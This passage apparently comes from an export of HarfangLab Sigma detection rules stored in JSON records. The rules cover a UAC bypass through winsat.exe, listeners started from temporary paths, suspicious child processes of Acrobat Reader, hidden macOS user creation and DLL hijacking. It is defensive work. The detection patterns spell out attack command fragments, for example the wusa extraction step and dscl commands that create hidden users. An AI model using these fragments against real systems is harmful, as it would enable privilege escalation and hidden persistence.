'/Applications/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n - Image: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n exclusion_battlenet:\n Image: '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n\n exclusion_wizards:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.wizards.mtga'\n\n exclusion_maxon:\n ProcessSigned: 'true'\n 
ProcessSignatureSigningId: 'net.maxon.maxonapp.installer'\n\n exclusion_gog:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gog.galaxy.updater'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08ddafaf-401d-4c3d-9389-e96925e90f0f",
"rule_name": "File Executed from Users Shared Folder",
"rule_description": "Detects the execution of a file from the Users shared folder.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-09-24",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08e4776f-548a-4b01-8538-c2af435dce4b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093473Z",
"creation_date": "2026-03-23T11:45:34.093475Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093479Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198"
],
"name": "t1548_002_uac_bypass_winsat.yml",
"content": "title: UAC Bypass Executed via winsat.exe\nid: 08e4776f-548a-4b01-8538-c2af435dce4b\ndescription: |\n Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2025/01/31\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_prepare:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c wusa ?:\\Users\\\\*\\AppData\\Local\\Temp\\update.msu /extract:?:\\Windows\\system32\\sysprep\\'\n\n selection_exploit:\n CommandLine: '?:\\Windows\\system32\\sysprep\\winsat.exe'\n ProcessIntegrityLevel: 'High'\n ProcessParentIntegrityLevel: 'Medium'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08e4776f-548a-4b01-8538-c2af435dce4b",
"rule_name": "UAC Bypass Executed via winsat.exe",
"rule_description": "Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n",
"rule_creation_date": "2025-01-31",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08f3ae91-3811-4a4b-8f04-87302ca365c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612661Z",
"creation_date": "2026-03-23T11:45:34.612665Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612672Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1571/",
"https://attack.mitre.org/techniques/T1205/001/",
"https://attack.mitre.org/techniques/T1104/"
],
"name": "t1571_process_listen_connections_suspicious_path.yml",
"content": "title: Process Started Listening for Incoming Connections from Suspicious Path\nid: 08f3ae91-3811-4a4b-8f04-87302ca365c9\ndescription: |\n Detects a process that starts listening for incoming connections from a suspicious path.\n Attackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\n It is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://attack.mitre.org/techniques/T1571/\n - https://attack.mitre.org/techniques/T1205/001/\n - https://attack.mitre.org/techniques/T1104/\ndate: 2023/12/15\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1571\n - attack.t1104\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - classification.Linux.Source.NetworkListen\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: network_listen\n product: linux\ndetection:\n\n selection:\n ProcessImage|startswith:\n - '/tmp/'\n - '/var/'\n - '/run/'\n - '/root/'\n - '/dev/shm/'\n - '/boot/'\n\n filter_var:\n ProcessImage|startswith:\n - '/var/lib/'\n - '/var/opt/'\n\n # Ports opened on localhost aren't considered suspicious\n filter_localhost:\n Address:\n - '127.0.0.1'\n - '::1'\n\n exclusion_java:\n # Java is embedded in so much application it becomes quickly unfeasable to list all of them\n ProcessImage|endswith: '/java'\n\n exclusion_hoptimal:\n ProcessImage: '/tmp/InstalleurVIDALHoptimalAndApi_unix_*/jre/bin/java'\n\n exclusion_go:\n # /tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_jetbrains:\n ProcessImage: 
'/tmp/.mount_*/jetbrains-toolbox'\n\n exclusion_veeam:\n ProcessImage:\n - '/tmp/VeeamAgent*/veeamagent'\n - '/var/tmp/veeamagent*/veeamagent'\n\n exclusion_collabora_appimage:\n ProcessImage: '/tmp/appimage_extracted_*/usr/bin/coolwsd'\n\n exclusion_veeam_plugin_manager:\n ProcessParentImage: '/opt/veeam/VeeamPluginforOracleRMAN/RMANPluginManager'\n\n exclusion_ossec_ids:\n - ProcessImage:\n - '/var/ossec/bin/wazuh-remoted'\n - '/var/ossec/bin/wazuh-authd'\n - ProcessCommandLine: '/var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh_apid.py'\n\n exclusion_nexcloud:\n ProcessImage: '/var/www/html/nextcloud/*/apps/notify_push/bin/x86_64/notify_push'\n\n exclusion_oracle:\n ProcessImage: '/tmp/CVU_*_resource/exectask'\n\n exclusion_vscode:\n ProcessImage: '/root/.vscode-server/bin/*/node'\n\n exclusion_k3s:\n ProcessImage|endswith: '/k3s/data/*/bin/k3s'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08f3ae91-3811-4a4b-8f04-87302ca365c9",
"rule_name": "Process Started Listening for Incoming Connections from Suspicious Path",
"rule_description": "Detects a process that starts listening for incoming connections from a suspicious path.\nAttackers may set up reverse shells listening for incoming connections as a persistence and C2 mechanism.\nIt is recommended to ensure the process had a legitimate reason to do so and that the host wasn't compromised.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-02-27",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1104",
"attack.t1205.001",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08f5486f-0238-406f-a789-aad56def2bd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626532Z",
"creation_date": "2026-03-23T11:45:34.626534Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626538Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1104_acrobat_spawning_malicious_process.yml",
"content": "title: Suspicious Process Started by Acrobat Reader\nid: 08f5486f-0238-406f-a789-aad56def2bd3\ndescription: |\n Detects the suspicious execution of binaries by Adobe Acrobat Reader.\n Adversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\n For example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\n It is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\nreferences:\n - https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/01/31\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_acrobat:\n ParentImage|endswith:\n - '\\Acrobat.exe'\n - '\\AcroRd32.exe'\n - '\\Acrobat_sl.exe'\n - '\\AcroCEF.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # 
https://twitter.com/ShadowChasing1/status/1557287930267578368\n - 'calc.exe' # For POCs\n\n exclusion_msiexec_adobe:\n CommandLine|contains:\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALL=ALL REINSTALLMODE=omus /qb\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FF00-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-7AD7-1036-7B44-AC0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-0C0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # msiexec.exe /I {AC76BA86-1033-F400-BA7E-000000000004} ADDLOCAL=ChineseSLanguageSupport /qb\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1033-FFFF-7760-000000000006} REINSTALL=ALL REINSTALLMODE=omus /qb\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} '\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} ' # The two spaces are intentional\n - 'msiexec.exe /fmous {AC76BA86-????-????-????-????????????} '\n OriginalFileName: 'msiexec.exe'\n\n exclusion_spool:\n CommandLine|startswith:\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn140.DLL,MonitorPrintJobStatus *\n # rundll32 
C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn175.dll,MonitorPrintJobStatus *\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - 'rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n # regsvr32 /s /n /i C:\\Windows\\system32\\spool\\DRIVERS\\W32X86\\3\\UDCOfficeAddin2000.dll\n - 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_rundll32:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd MIIGq'\n - '?:\\WINDOWS\\System32\\RunDll32.exe ?:\\WINDOWS\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification '\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\System32\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n\n exclusion_mailprotocolhandler:\n CommandLine|contains: 'rundll32.exe *,MailToProtocolHandler mailto:'\n\n exclusion_open_adobe_website:\n CommandLine|contains:\n - 'start microsoft-edge:http://www.adobe.com/'\n - 'start microsoft-edge:http://acrobat.adobe.com/'\n - 'start microsoft-edge:https://www.adobe.com/'\n - 'start microsoft-edge:https://acrobat.adobe.com/'\n\n condition: all of selection_* and not 1 of 
exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08f5486f-0238-406f-a789-aad56def2bd3",
"rule_name": "Suspicious Process Started by Acrobat Reader",
"rule_description": "Detects the suspicious execution of binaries by Adobe Acrobat Reader.\nAdversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\nFor example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\nIt is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\n",
"rule_creation_date": "2023-01-31",
"rule_modified_date": "2026-01-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0915b4a3-17da-4c9c-bf08-1db96769b345",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625928Z",
"creation_date": "2026-03-23T11:45:34.625930Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625934Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md",
"https://attack.mitre.org/techniques/T1564/002/"
],
"name": "t1564_002_create_hidden_user_macos.yml",
"content": "title: Hidden User Created\nid: 0915b4a3-17da-4c9c-bf08-1db96769b345\ndescription: |\n Detects a suspicious attempt at creating a hidden user.\n Adversaries may use hidden users to hide the presence of user accounts they create or modify.\n It is recommended to check it the created account is expected to be created.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md\n - https://attack.mitre.org/techniques/T1564/002/\ndate: 2022/08/25\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base_dscl:\n Image: '/usr/bin/dscl'\n User: 'root'\n CommandLine|contains:\n - ' create'\n - ' -create'\n ParentImage|contains: '?'\n\n selection_specific_dscl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*UniqueID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - 'UniqueID ? '\n - 'UniqueID ?? '\n - 'UniqueID 1?? '\n - 'UniqueID 2?? '\n - 'UniqueID 3?? '\n - 'UniqueID 4?? 
'\n\n selection_specific_dscl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - 'UniqueID ?'\n - 'UniqueID ??'\n - 'UniqueID 1??'\n - 'UniqueID 2??'\n - 'UniqueID 3??'\n - 'UniqueID 4??'\n\n selection_specific_dscl_hidden_parameter:\n #CommandLine|re: '.*IsHidden *1.*'\n CommandLine|contains:\n - 'IsHidden *1'\n - 'IsHidden *true'\n\n selection_base_sysadminctl:\n Image: '/usr/sbin/sysadminctl'\n User: 'root'\n CommandLine|contains: ' -addUser'\n ParentImage|contains: '?'\n\n selection_specific_sysadminctl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*-UID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - '-UID ? '\n - '-UID ?? '\n - '-UID 1?? '\n - '-UID 2?? '\n - '-UID 3?? '\n - '-UID 4?? '\n\n selection_specific_sysadminctl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - '-UID ?'\n - '-UID ??'\n - '-UID 1??'\n - '-UID 2??'\n - '-UID 3??'\n - '-UID 4??'\n\n exclusion_jamf:\n # /usr/bin/dscl localhost -create /Local/Default/Users/mngt-admin IsHidden 1\n # parent:\n # /usr/local/jamf/bin/jamf postMdmEnrollment -server_url https://xxxx.jamfcloud.com -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n # jamf enroll -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyy -noPolicy\n - ProcessParentImage: '/usr/local/jamf/bin/jamf'\n - ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n exclusion_known_users:\n ProcessCommandLine|contains:\n - '/usr/bin/dscl . -create users/_fsvpn_' # fsecure\n - 'create /users/_nixbld' # nix\n - 'dscl . 
create /users/eset-ecsm-' # eset\n\n exclusion_windscribe:\n ProcessParentImage: '/Library/PrivilegedHelperTools/com.windscribe.helper.macos'\n\n exclusion_installer:\n - ProcessParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_intune:\n ProcessGrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: ((selection_base_dscl and 1 of selection_specific_dscl_*) or (selection_base_sysadminctl and 1 of selection_specific_sysadminctl_*)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0915b4a3-17da-4c9c-bf08-1db96769b345",
"rule_name": "Hidden User Created",
"rule_description": "Detects a suspicious attempt at creating a hidden user.\nAdversaries may use hidden users to hide the presence of user accounts they create or modify.\nIt is recommended to check whether the created account was expected to be created.\n",
"rule_creation_date": "2022-08-25",
"rule_modified_date": "2025-12-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "096b4462-7384-4447-95a6-a2c2c26ffcb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096369Z",
"creation_date": "2026-03-23T11:45:34.096371Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096375Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia",
"https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/",
"https://twitter.com/malwrhunterteam/status/1558149472672251904",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mcods.yml",
"content": "title: DLL Hijacking via McOds.exe\nid: 096b4462-7384-4447-95a6-a2c2c26ffcb0\ndescription: |\n Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\n - https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/\n - https://twitter.com/malwrhunterteam/status/1558149472672251904\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'McOds.exe'\n ImageLoaded|endswith: '\\McVsoCfg.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "096b4462-7384-4447-95a6-a2c2c26ffcb0",
"rule_name": "DLL Hijacking via McOds.exe",
"rule_description": "Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09718066-8257-4dd4-83e0-14787bbc9fd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
